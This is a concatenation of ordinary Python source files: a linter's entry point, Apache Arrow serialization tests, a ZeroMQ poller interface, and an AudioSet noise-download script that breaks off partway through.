def main(args=None):
"""Main method for pre commit linter script that lints Python, JavaScript,
HTML, and CSS files.
"""
parsed_args = _PARSER.parse_args(args=args)
# File extension to be linted.
file_extension_types = _get_file_extensions(
parsed_args.only_check_file_extensions)
# Default mode is non-verbose mode, if arguments contains --verbose flag it
# will be made True, which will represent verbose mode.
verbose_mode_enabled = bool(parsed_args.verbose)
all_filepaths = _get_all_filepaths(parsed_args.path, parsed_args.files)
install_third_party_libs.main()
python_utils.PRINT('Starting Linter....')
if len(all_filepaths) == 0:
python_utils.PRINT('---------------------------')
python_utils.PRINT('No files to check.')
python_utils.PRINT('---------------------------')
return
read_files(all_filepaths)
categorize_files(all_filepaths)
# Prepare custom tasks.
custom_max_concurrent_runs = 25
custom_concurrent_count = min(
multiprocessing.cpu_count(), custom_max_concurrent_runs)
custom_semaphore = threading.Semaphore(custom_concurrent_count)
# Prepare third_party tasks.
third_party_max_concurrent_runs = 2
third_party_concurrent_count = min(
multiprocessing.cpu_count(), third_party_max_concurrent_runs)
third_party_semaphore = threading.Semaphore(third_party_concurrent_count)
custom_linters = []
third_party_linters = []
for file_extension_type in file_extension_types:
custom_linter, third_party_linter = _get_linters_for_file_extension(
file_extension_type)
custom_linters += custom_linter
third_party_linters += third_party_linter
# Create tasks.
tasks_custom = []
tasks_third_party = []
for linter in custom_linters:
task_custom = concurrent_task_utils.create_task(
linter.perform_all_lint_checks, verbose_mode_enabled,
custom_semaphore, name='custom')
tasks_custom.append(task_custom)
for linter in third_party_linters:
task_third_party = concurrent_task_utils.create_task(
linter.perform_all_lint_checks, verbose_mode_enabled,
third_party_semaphore, name='third_party')
tasks_third_party.append(task_third_party)
# Execute tasks.
# Here we set Concurrency limit for custom task to 25 because we need to
# parallelize the tasks to work on full capacity of CPU.
# Concurrency limit for third party tasks is set to 2 because these
# third party libraries have their own ways to lint at their fastest
# (ie. might parallelize on their own)
# Concurrency limit: 25.
concurrent_task_utils.execute_tasks(tasks_custom, custom_semaphore)
# Concurrency limit: 2.
concurrent_task_utils.execute_tasks(
tasks_third_party, third_party_semaphore)
lint_messages = []
failed = False
for task in tasks_custom:
failed = _get_task_output(lint_messages, failed, task)
for task in tasks_third_party:
failed = _get_task_output(lint_messages, failed, task)
errors_stacktrace = concurrent_task_utils.ALL_ERRORS
if errors_stacktrace:
_print_errors_stacktrace(errors_stacktrace)
if failed:
_print_summary_of_error_messages(lint_messages)
python_utils.PRINT('---------------------------')
python_utils.PRINT('Checks Not Passed.')
python_utils.PRINT('---------------------------')
sys.exit(1)
else:
python_utils.PRINT('---------------------------')
python_utils.PRINT('All Checks Passed.')
python_utils.PRINT('---------------------------')
NAME_SPACE = multiprocessing.Manager().Namespace()
PROCESSES = multiprocessing.Manager().dict()
NAME_SPACE.files = FileCache()
FILE_CACHE = NAME_SPACE.files
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when pre_commit_linter.py is used as a
# script.
if __name__ == '__main__': # pragma: no cover
main()
|
test_serialization.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import division
import pytest
from collections import namedtuple, OrderedDict, defaultdict
import datetime
import os
import string
import sys
import pyarrow as pa
import numpy as np
import pyarrow.tests.util as test_util
try:
import torch
except ImportError:
torch = None
# Blacklist the module in case `import torch` is costly before
# failing (ARROW-2071)
sys.modules['torch'] = None
def assert_equal(obj1, obj2):
if torch is not None and torch.is_tensor(obj1) and torch.is_tensor(obj2):
assert torch.equal(obj1, obj2)
return
module_numpy = (type(obj1).__module__ == np.__name__ or
type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ()) or
(hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently np.testing.assert_equal
# fails because we do not properly handle different numerical
# types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) ==
set(list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
"and {} are "
"different."
.format(
obj1,
obj2))
try:
# Workaround to make comparison of OrderedDicts work on Python 2.7
if obj1 == obj2:
return
except Exception:
pass
if obj1.__dict__ == {}:
print("WARNING: Empty dict in ", obj1)
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
"different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (pa.lib.is_named_tuple(type(obj1)) or
pa.lib.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
"with different lengths."
.format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif isinstance(obj1, pa.Array) and isinstance(obj2, pa.Array):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.Tensor) and isinstance(obj2, pa.Tensor):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.Tensor) and isinstance(obj2, pa.Tensor):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.RecordBatch) and isinstance(obj2, pa.RecordBatch):
assert obj1.equals(obj2)
elif isinstance(obj1, pa.Table) and isinstance(obj2, pa.Table):
assert obj1.equals(obj2)
else:
assert type(obj1) == type(obj2) and obj1 == obj2, \
"Objects {} and {} are different.".format(obj1, obj2)
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 999,
[1 << 100, [1 << 100]], "a", string.printable, "\u262F",
"hello world", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
None, True, False, [], (), {}, {(1, 2): 1}, {(): 2},
[1, "hello", 3.0], u"\u262F", 42.0, (1.0, "hi"),
[1, 2, 3, None], [(None,), 3, 1.0], ["h", "e", "l", "l", "o", None],
(None, None), ("hello", None), (True, False),
{True: "hello", False: "world"}, {"hello": "world", 1: 42, 2.5: 45},
{"hello": set([2, 3]), "world": set([42.0]), "this": None},
np.int8(3), np.int32(4), np.int64(5),
np.uint8(3), np.uint32(4), np.uint64(5),
np.float16(1.9), np.float32(1.9),
np.float64(1.9), np.zeros([8, 20]),
np.random.normal(size=[17, 10]), np.array(["hi", 3]),
np.array(["hi", 3], dtype=object),
np.random.normal(size=[15, 13]).T
]
if sys.version_info >= (3, 0):
PRIMITIVE_OBJECTS += [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
PRIMITIVE_OBJECTS += [long(42), long(1 << 62), long(0), # noqa
np.array([["hi", u"hi"],
[1.3, long(1)]])] # noqa
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{"obj{}".format(i): np.random.normal(size=[4, 4]) for i in range(5)},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
((((((((((),),),),),),),),),),
{"a": {"b": {"c": {"d": {}}}}},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(1), Foo(42)]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class SubQuxPickle(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = namedtuple("Point", ["x", "y"])
NamedTupleExample = namedtuple("Example",
"field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [Exception("Test object."), CustomError(), Point(11, y=22),
Foo(), Bar(), Baz(), Qux(), SubQux(), SubQuxPickle(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
OrderedDict([("hello", 1), ("world", 2)])]
def make_serialization_context():
context = pa.default_serialization_context()
context.register_type(Foo, "Foo")
context.register_type(Bar, "Bar")
context.register_type(Baz, "Baz")
context.register_type(Qux, "Quz")
context.register_type(SubQux, "SubQux")
context.register_type(SubQuxPickle, "SubQuxPickle", pickle=True)
context.register_type(Exception, "Exception")
context.register_type(CustomError, "CustomError")
context.register_type(Point, "Point")
context.register_type(NamedTupleExample, "NamedTupleExample")
return context
global_serialization_context = make_serialization_context()
def serialization_roundtrip(value, scratch_buffer,
context=global_serialization_context):
writer = pa.FixedSizeBufferWriter(scratch_buffer)
pa.serialize_to(value, writer, context=context)
reader = pa.BufferReader(scratch_buffer)
result = pa.deserialize_from(reader, None, context=context)
assert_equal(value, result)
_check_component_roundtrip(value, context=context)
def _check_component_roundtrip(value, context=global_serialization_context):
# Test to/from components
serialized = pa.serialize(value, context=context)
components = serialized.to_components()
from_comp = pa.SerializedPyObject.from_components(components)
recons = from_comp.deserialize(context=context)
assert_equal(value, recons)
@pytest.yield_fixture(scope='session')
def large_buffer(size=32*1024*1024):
return pa.allocate_buffer(size)
def large_memory_map(tmpdir_factory, size=100*1024*1024):
path = (tmpdir_factory.mktemp('data')
.join('pyarrow-serialization-tmp-file').strpath)
# Create a large memory mapped file
with open(path, 'wb') as f:
f.write(np.random.randint(0, 256, size=size)
.astype('u1')
.tobytes()
[:size])
return path
def test_clone():
context = pa.SerializationContext()
class Foo(object):
pass
def custom_serializer(obj):
return 0
def custom_deserializer(serialized_obj):
return (serialized_obj, 'a')
context.register_type(Foo, 'Foo', custom_serializer=custom_serializer,
custom_deserializer=custom_deserializer)
new_context = context.clone()
f = Foo()
serialized = pa.serialize(f, context=context)
deserialized = serialized.deserialize(context=context)
assert deserialized == (0, 'a')
serialized = pa.serialize(f, context=new_context)
deserialized = serialized.deserialize(context=new_context)
assert deserialized == (0, 'a')
def test_primitive_serialization(large_buffer):
for obj in PRIMITIVE_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_integer_limits(large_buffer):
# Check that Numpy scalars can be represented up to their limit values
# (except np.uint64 which is limited to 2**63 - 1)
for dt in [np.int8, np.int64, np.int32, np.int64,
np.uint8, np.uint64, np.uint32, np.uint64]:
scal = dt(np.iinfo(dt).min)
serialization_roundtrip(scal, large_buffer)
if dt is not np.uint64:
scal = dt(np.iinfo(dt).max)
serialization_roundtrip(scal, large_buffer)
else:
scal = dt(2**63 - 1)
serialization_roundtrip(scal, large_buffer)
for v in (2**63, 2**64 - 1):
scal = dt(v)
with pytest.raises(pa.ArrowInvalid):
pa.serialize(scal)
def test_serialize_to_buffer():
for nthreads in [1, 4]:
for value in COMPLEX_OBJECTS:
buf = pa.serialize(value).to_buffer(nthreads=nthreads)
result = pa.deserialize(buf)
assert_equal(value, result)
def test_complex_serialization(large_buffer):
for obj in COMPLEX_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_custom_serialization(large_buffer):
for obj in CUSTOM_OBJECTS:
serialization_roundtrip(obj, large_buffer)
def test_default_dict_serialization(large_buffer):
pytest.importorskip("cloudpickle")
obj = defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
serialization_roundtrip(obj, large_buffer)
def test_numpy_serialization(large_buffer):
for t in ["bool", "int8", "uint8", "int16", "uint16", "int32",
"uint32", "float16", "float32", "float64", "<U1", "<U2", "<U3",
"<U4", "|S1", "|S2", "|S3", "|S4", "|O"]:
obj = np.random.randint(0, 10, size=(100, 100)).astype(t)
serialization_roundtrip(obj, large_buffer)
obj = obj[1:99, 10:90]
serialization_roundtrip(obj, large_buffer)
def test_datetime_serialization(large_buffer):
data = [
# Principia Mathematica published
datetime.datetime(year=1687, month=7, day=5),
# Some random date
datetime.datetime(year=1911, month=6, day=3, hour=4,
minute=55, second=44),
# End of WWI
datetime.datetime(year=1918, month=11, day=11),
# Beginning of UNIX time
datetime.datetime(year=1970, month=1, day=1),
# The Berlin wall falls
datetime.datetime(year=1989, month=11, day=9),
# Another random date
datetime.datetime(year=2011, month=6, day=3, hour=4,
minute=0, second=3),
# Another random date
datetime.datetime(year=1970, month=1, day=3, hour=4,
minute=0, second=0)
]
for d in data:
serialization_roundtrip(d, large_buffer)
def test_torch_serialization(large_buffer):
pytest.importorskip("torch")
serialization_context = pa.default_serialization_context()
pa.register_torch_serialization_handlers(serialization_context)
# These are the only types that are supported for the
# PyTorch to NumPy conversion
for t in ["float32", "float64",
"uint8", "int16", "int32", "int64"]:
obj = torch.from_numpy(np.random.randn(1000).astype(t))
serialization_roundtrip(obj, large_buffer,
context=serialization_context)
tensor_requiring_grad = torch.randn(10, 10, requires_grad=True)
serialization_roundtrip(tensor_requiring_grad, large_buffer,
context=serialization_context)
@pytest.mark.skipif(not torch or not torch.cuda.is_available(),
reason="requires pytorch with CUDA")
def test_torch_cuda():
# ARROW-2920: This used to segfault if torch is not imported
# before pyarrow
# Note that this test will only catch the issue if it is run
# with a pyarrow that has been built in the manylinux1 environment
torch.nn.Conv2d(64, 2, kernel_size=3, stride=1,
padding=1, bias=False).cuda()
def test_numpy_immutable(large_buffer):
obj = np.zeros([10])
writer = pa.FixedSizeBufferWriter(large_buffer)
pa.serialize_to(obj, writer, global_serialization_context)
reader = pa.BufferReader(large_buffer)
result = pa.deserialize_from(reader, None, global_serialization_context)
with pytest.raises(ValueError):
result[0] = 1.0
def test_numpy_base_object(tmpdir):
# ARROW-2040: deserialized Numpy array should keep a reference to the
# owner of its memory
path = os.path.join(str(tmpdir), 'zzz.bin')
data = np.arange(12, dtype=np.int32)
with open(path, 'wb') as f:
f.write(pa.serialize(data).to_buffer())
serialized = pa.read_serialized(pa.OSFile(path))
result = serialized.deserialize()
assert_equal(result, data)
serialized = None
assert_equal(result, data)
assert result.base is not None
# see https://issues.apache.org/jira/browse/ARROW-1695
def test_serialization_callback_numpy():
class DummyClass(object):
pass
def serialize_dummy_class(obj):
x = np.zeros(4)
return x
def deserialize_dummy_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(DummyClass, "DummyClass",
custom_serializer=serialize_dummy_class,
custom_deserializer=deserialize_dummy_class)
pa.serialize(DummyClass(), context=context)
def test_numpy_subclass_serialization():
# Check that we can properly serialize subclasses of np.ndarray.
class CustomNDArray(np.ndarray):
def __new__(cls, input_array):
array = np.asarray(input_array).view(cls)
return array
def serializer(obj):
return {'numpy': obj.view(np.ndarray)}
def deserializer(data):
array = data['numpy'].view(CustomNDArray)
return array
context = pa.default_serialization_context()
context.register_type(CustomNDArray, 'CustomNDArray',
custom_serializer=serializer,
custom_deserializer=deserializer)
x = CustomNDArray(np.zeros(3))
serialized = pa.serialize(x, context=context).to_buffer()
new_x = pa.deserialize(serialized, context=context)
assert type(new_x) == CustomNDArray
assert np.alltrue(new_x.view(np.ndarray) == np.zeros(3))
def test_pyarrow_objects_serialization(large_buffer):
# NOTE: We have to put these objects inside,
# or it will affect 'test_total_bytes_allocated'.
pyarrow_objects = [
pa.array([1, 2, 3, 4]), pa.array(['1', u'never U+1F631', '',
u"233 * U+1F600"]),
pa.array([1, None, 2, 3]),
pa.Tensor.from_numpy(np.random.rand(2, 3, 4)),
pa.RecordBatch.from_arrays(
[pa.array([1, None, 2, 3]),
pa.array(['1', u'never U+1F631', '', u"233 * u1F600"])],
['a', 'b']),
pa.Table.from_arrays([pa.array([1, None, 2, 3]),
pa.array(['1', u'never U+1F631', '',
u"233 * u1F600"])],
['a', 'b'])
]
for obj in pyarrow_objects:
serialization_roundtrip(obj, large_buffer)
def test_buffer_serialization():
class BufferClass(object):
pass
def serialize_buffer_class(obj):
return pa.py_buffer(b"hello")
def deserialize_buffer_class(serialized_obj):
return serialized_obj
context = pa.default_serialization_context()
context.register_type(
BufferClass, "BufferClass",
custom_serializer=serialize_buffer_class,
custom_deserializer=deserialize_buffer_class)
b = pa.serialize(BufferClass(), context=context).to_buffer()
assert pa.deserialize(b, context=context).to_pybytes() == b"hello"
@pytest.mark.skip(reason="extensive memory requirements")
def test_arrow_limits(self):
def huge_memory_map(temp_dir):
return large_memory_map(temp_dir, 100 * 1024 * 1024 * 1024)
with pa.memory_map(huge_memory_map, mode="r+") as mmap:
# Test that objects that are too large for Arrow throw a Python
# exception. These tests give out of memory errors on Travis and need
# to be run on a machine with lots of RAM.
x = 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * ["s"]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [["1"], 2, 3, [{"s": 4}]]
serialization_roundtrip(x, mmap)
del x
x = 2 ** 29 * [{"s": 1}] + 2 ** 29 * [1.0]
serialization_roundtrip(x, mmap)
del x
x = np.zeros(2 ** 25)
serialization_roundtrip(x, mmap)
del x
x = [np.zeros(2 ** 18) for _ in range(2 ** 7)]
serialization_roundtrip(x, mmap)
del x
def test_serialization_callback_error():
class TempClass(object):
pass
# Pass a SerializationContext into serialize, but TempClass
# is not registered
serialization_context = pa.SerializationContext()
val = TempClass()
with pytest.raises(pa.SerializationCallbackError) as err:
serialized_object = pa.serialize(val, serialization_context)
assert err.value.example_object == val
serialization_context.register_type(TempClass, "TempClass")
serialized_object = pa.serialize(TempClass(), serialization_context)
deserialization_context = pa.SerializationContext()
# Pass a Serialization Context into deserialize, but TempClass
# is not registered
with pytest.raises(pa.DeserializationCallbackError) as err:
serialized_object.deserialize(deserialization_context)
assert err.value.type_id == "TempClass"
class TempClass2(object):
pass
# Make sure that we receive an error when we use an inappropriate value for
# the type_id argument.
with pytest.raises(TypeError):
serialization_context.register_type(TempClass2, 1)
def test_fallback_to_subclasses():
class SubFoo(Foo):
def __init__(self):
Foo.__init__(self)
# should be able to serialize/deserialize an instance
# if a base class has been registered
serialization_context = pa.SerializationContext()
serialization_context.register_type(Foo, "Foo")
subfoo = SubFoo()
# should fallbact to Foo serializer
serialized_object = pa.serialize(subfoo, serialization_context)
reconstructed_object = serialized_object.deserialize(
serialization_context
)
assert type(reconstructed_object) == Foo
class Serializable(object):
pass
def serialize_serializable(obj):
return {"type": type(obj), "data": obj.__dict__}
def deserialize_serializable(obj):
val = obj["type"].__new__(obj["type"])
val.__dict__.update(obj["data"])
return val
class SerializableClass(Serializable):
def __init__(self):
self.value = 3
def test_serialize_subclasses():
# This test shows how subclasses can be handled in an idiomatic way
# by having only a serializer for the base class
# This technique should however be used with care, since pickling
# type(obj) with couldpickle will include the full class definition
# in the serialized representation.
# This means the class definition is part of every instance of the
# object, which in general is not desirable; registering all subclasses
# with register_type will result in faster and more memory
# efficient serialization.
context = pa.default_serialization_context()
context.register_type(
Serializable, "Serializable",
custom_serializer=serialize_serializable,
custom_deserializer=deserialize_serializable)
a = SerializableClass()
serialized = pa.serialize(a, context=context)
deserialized = serialized.deserialize(context=context)
assert type(deserialized).__name__ == SerializableClass.__name__
assert deserialized.value == 3
def test_serialize_to_components_invalid_cases():
buf = pa.py_buffer(b'hello')
components = {
'num_tensors': 0,
'num_ndarrays': 0,
'num_buffers': 1,
'data': [buf]
}
with pytest.raises(pa.ArrowInvalid):
pa.deserialize_components(components)
components = {
'num_tensors': 0,
'num_ndarrays': 1,
'num_buffers': 0,
'data': [buf, buf]
}
with pytest.raises(pa.ArrowInvalid):
pa.deserialize_components(components)
def test_serialize_read_concatenated_records():
# ARROW-1996 -- see stream alignment work in ARROW-2840, ARROW-3212
f = pa.BufferOutputStream()
pa.serialize_to(12, f)
pa.serialize_to(23, f)
buf = f.getvalue()
f = pa.BufferReader(buf)
pa.read_serialized(f).deserialize()
pa.read_serialized(f).deserialize()
@pytest.mark.skipif(os.name == 'nt', reason="deserialize_regex not pickleable")
def test_deserialize_in_different_process():
from multiprocessing import Process, Queue
import re
regex = re.compile(r"\d+\.\d*")
serialization_context = pa.SerializationContext()
serialization_context.register_type(type(regex), "Regex", pickle=True)
serialized = pa.serialize(regex, serialization_context)
serialized_bytes = serialized.to_buffer().to_pybytes()
def deserialize_regex(serialized, q):
import pyarrow as pa
q.put(pa.deserialize(serialized))
q = Queue()
p = Process(target=deserialize_regex, args=(serialized_bytes, q))
p.start()
assert q.get().pattern == regex.pattern
p.join()
def test_deserialize_buffer_in_different_process():
import tempfile
import subprocess
f = tempfile.NamedTemporaryFile(delete=False)
b = pa.serialize(pa.py_buffer(b'hello')).to_buffer()
f.write(b.to_pybytes())
f.close()
subprocess_env = test_util.get_modified_env_with_pythonpath()
dir_path = os.path.dirname(os.path.realpath(__file__))
python_file = os.path.join(dir_path, 'deserialize_buffer.py')
subprocess.check_call([sys.executable, python_file, f.name],
env=subprocess_env)
def test_set_pickle():
# Use a custom type to trigger pickling.
class Foo(object):
pass
context = pa.SerializationContext()
context.register_type(Foo, 'Foo', pickle=True)
test_object = Foo()
# Define a custom serializer and deserializer to use in place of pickle.
def dumps1(obj):
return b'custom'
def loads1(serialized_obj):
return serialized_obj + b' serialization 1'
# Test that setting a custom pickler changes the behavior.
context.set_pickle(dumps1, loads1)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 1'
# Define another custom serializer and deserializer.
def dumps2(obj):
return b'custom'
def loads2(serialized_obj):
return serialized_obj + b' serialization 2'
# Test that setting another custom pickler changes the behavior again.
context.set_pickle(dumps2, loads2)
serialized = pa.serialize(test_object, context=context).to_buffer()
deserialized = pa.deserialize(serialized.to_pybytes(), context=context)
assert deserialized == b'custom serialization 2'
@pytest.mark.skipif(sys.version_info < (3, 6), reason="need Python 3.6")
def test_path_objects(tmpdir):
# Test compatibility with PEP 519 path-like objects
import pathlib
p = pathlib.Path(tmpdir) / 'zzz.bin'
obj = 1234
pa.serialize_to(obj, p)
res = pa.deserialize_from(p, None)
assert res == obj
def test_tensor_alignment():
# Deserialized numpy arrays should be 64-byte aligned.
x = np.random.normal(size=(10, 20, 30))
y = pa.deserialize(pa.serialize(x).to_buffer())
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i) for i in range(100)]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i * (1,)) for i in range(20)]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
xs = [np.random.normal(size=i * (5,)) for i in range(1, 8)]
xs = [xs[i][(i + 1) * (slice(1, 3),)] for i in range(len(xs))]
ys = pa.deserialize(pa.serialize(xs).to_buffer())
for y in ys:
assert y.ctypes.data % 64 == 0
def test_serialization_determinism():
for obj in COMPLEX_OBJECTS:
buf1 = pa.serialize(obj).to_buffer()
buf2 = pa.serialize(obj).to_buffer()
assert buf1.to_pybytes() == buf2.to_pybytes()
|
zmq_poller.py
|
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import multiprocessing
import six
@six.add_metaclass(abc.ABCMeta)
class ZmqPoller(object):
"""Base poller interface
Needed to poll on zmq sockets in green and native async manner.
Native poller implementation wraps zmq.Poller helper class.
Wrapping is needed to provide unified poller interface
in zmq-driver (for both native and zmq pollers). It makes some
difference with poller-helper from zmq library which doesn't actually
receive message.
The poller object should be obtained over:
poller = zmq_async.get_poller()
Then we have to register sockets for polling. We are able
to provide specific receiving method. By default poller calls
socket.recv_multipart.
def receive_message(socket):
id = socket.recv_string()
ctxt = socket.recv_json()
msg = socket.recv_json()
return (id, ctxt, msg)
poller.register(socket, recv_method=receive_message)
Further to receive a message we should call:
message, socket = poller.poll()
The 'message' here contains (id, ctxt, msg) tuple.
"""
@abc.abstractmethod
def register(self, socket, recv_method=None):
"""Register socket to poll
:param socket: Socket to subscribe for polling
:type socket: zmq.Socket
:param recv_method: Optional specific receiver procedure
Should return received message object
:type recv_method: callable
"""
@abc.abstractmethod
def poll(self, timeout=None):
"""Poll for messages
:param timeout: Optional polling timeout
None or -1 means poll forever
any positive value means timeout in seconds
:type timeout: int
:returns: (message, socket) tuple
"""
@abc.abstractmethod
def close(self):
"""Terminate polling"""
def resume_polling(self, socket):
"""Resume with polling
Some implementations of poller may provide hold polling before reply
This method is intended to excplicitly resume polling aftewards.
"""
@six.add_metaclass(abc.ABCMeta)
class Executor(object):
"""Base executor interface for threading/green async executors"""
def __init__(self, thread):
self.thread = thread
@abc.abstractmethod
def execute(self):
"""Run execution"""
@abc.abstractmethod
def stop(self):
"""Stop execution"""
@abc.abstractmethod
def wait(self):
"""Wait until pass"""
@abc.abstractmethod
def done(self):
"""More soft way to stop rather than killing thread"""
class MutliprocessingExecutor(Executor):
def __init__(self, method):
process = multiprocessing.Process(target=self._loop)
self._method = method
super(MutliprocessingExecutor, self).__init__(process)
def _loop(self):
while not self._stop.is_set():
self._method()
def execute(self):
self.thread.start()
def stop(self):
self._stop.set()
def wait(self):
self.thread.join()
def done(self):
self._stop.set()
|
download_youtube_noise.py
|
"""
:author:
Paul Bethge (bethge@zkm.de)
2021
:License:
This package is published under Simplified BSD License.
"""
"""
A small script for downloading audio files from the "audioset" dataset using youtube-dl and ffmpeg
The list of files is passed as unbalanced_train_segments.csv
Unfortunately, the balanced_train_segments.csv has a slightly different style
Labels can be ignored by adding them to the restrictions list
"""
import os
import argparse
import threading
import subprocess
from queue import Queue
def downloadEnclosures(i, q):
while True:
try:
yt_url, start_s, length_s, output_dir = q.get()
download(yt_url, start_s, length_s, output_dir)
except Exception as e:
print("Download oopsi: ", e)
q.task_done()
def download(yt_url, start_s, length_s, output_dir):
command = """youtube-dl {} --extract-audio --audio-format wav -o "{}/%(title)s.%(ext)s" --postprocessor-args '-ss {} -t {} -ac 1 -ar 16000' """.format(yt_url, output_dir, start_s, length_s)
subprocess.call(command, shell=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--input_file', type=str,
required=True,
help="path to the unbalanced_train_segments.csv")
parser.add_argument('--output_dir', type=str,
default=os.path.join(os.getcwd(), "yt-noise"),
help="path to the output directory")
parser.add_argument('--num_threads', type=int,
default=8,
help="amount of worker threads")
parser.add_argument('--downloads', type=int,
default=100000,
help="amount of audio pieces to download")
args = parser.parse_args()
# worker queue
queue = Queue()
# create workers
for i in range(args.num_threads):
worker = threading.Thread(target=downloadEnclosures, args=(i, queue,), daemon=True)
worker.start()
# labels of audioset that should not be considered "noise"
# for example: human speech, singing
# labels taken from ontology.json ()
restrictions = [
### human sounds ###
# "/m/09l8g", # Human voice
"/m/09x0r", # Speech
"/m/05zppz", "/m/02zsn", "/m/0ytgt", "/m/01h8n0", "/m/02qldy", "/m/0261r1", "/m/0brhx",
"/m/02rtxlg", # whispering
"/m/015lz1", # singing
"/m/0l14jd", "/m/01swy6", "/m/02bk07", "/t/dd00003", "/t/dd00004", "/t/dd00005", "/t/dd00006", "/m/06bxc",
#### Music ###
"/m/05lls", # opera
"/m/0y4f8", # vocal music
"/m/0z9c", "/m/02cz_7",
]
# labels of audioset that should be considered "noise"
# for example: laughing, human locomotion
positives = [
### human sounds ###
"/m/0bpl036", # human locomotion
"/m/06h7j", "/m/07qv_x_", "/m/07pbtc8",
"/m/0k65p", # hands
"/m/025_jnm", "/m/0l15bq",
"/t/dd00012", # human group actions
"/m/0l15bq", # clapping
"/m/053hz1", # cheering
"/m/028ght", # applause
"/m/07rkbfh", # chatter
"/m/03qtwd", # crowd
"/m/07qfr4h", # speech noise
"/m/04v5dt", # Booing
"/t/dd00013", # Children playing
"/t/dd00135", # Children shouting
"/m/0463cq4", # crying
"/t/dd00002", "/m/07qz6j3",
"/m/02fxyj", # Humming
"/m/07s2xch", # Groan
"/m/07r4k75", # Grunt
"/m/01j423", # Yawn
"/m/07qw_06", # wail, moan
"/m/07plz5l", # sigh
"/m/01w250", # whistling
"/m/09hlz4", # respiratory sounds
"/m/0lyf6", # breathing
"/m/07mzm6", "/m/01d3sd", "/m/07s0dtb", "/m/07pyy8b", "/m/07q0yl5",
"/m/01hsr_", # sneeze
"/m/07ppn3j", # sniff
"/m/01b_21", # cough
"/m/0dl9sf8", # throat clearing
"/m/07p6fty", # shout
"/m/07q4ntr", # bellow
"/m/07rwj3x", # whoop
"/m/07sr1lc", # yell
"/m/04gy_2", # battle_cry
"/t/dd00135", # children shouting
"/m/03qc9zr", # screaming
"/m/01j3sz", # laughter
"/t/dd00001", "/m/07r660_", "/m/07s04w4", "/m/07sq110", "/m/07rgt08",
"/m/02p3nc" # hiccup
]
# open Youtube's dataset file
with open(args.input_file) as f:
# run for a certain number of downloads
num_files = args.downloads
file_count = 0
try:
# skip the first three line
print(f.readline())
print(f.readline())
